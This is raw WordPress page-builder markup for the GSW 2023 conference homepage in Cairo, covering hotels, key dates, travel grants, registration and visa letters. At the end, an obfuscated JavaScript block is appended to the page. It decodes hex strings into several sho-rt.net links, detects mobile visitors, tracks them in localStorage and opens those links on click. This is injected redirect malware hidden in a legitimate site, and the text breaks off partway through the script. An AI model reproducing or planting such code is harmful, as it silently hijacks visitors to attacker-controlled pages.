/></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" responsiveness=\"post_width_based\" pwb_columns=\"3\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 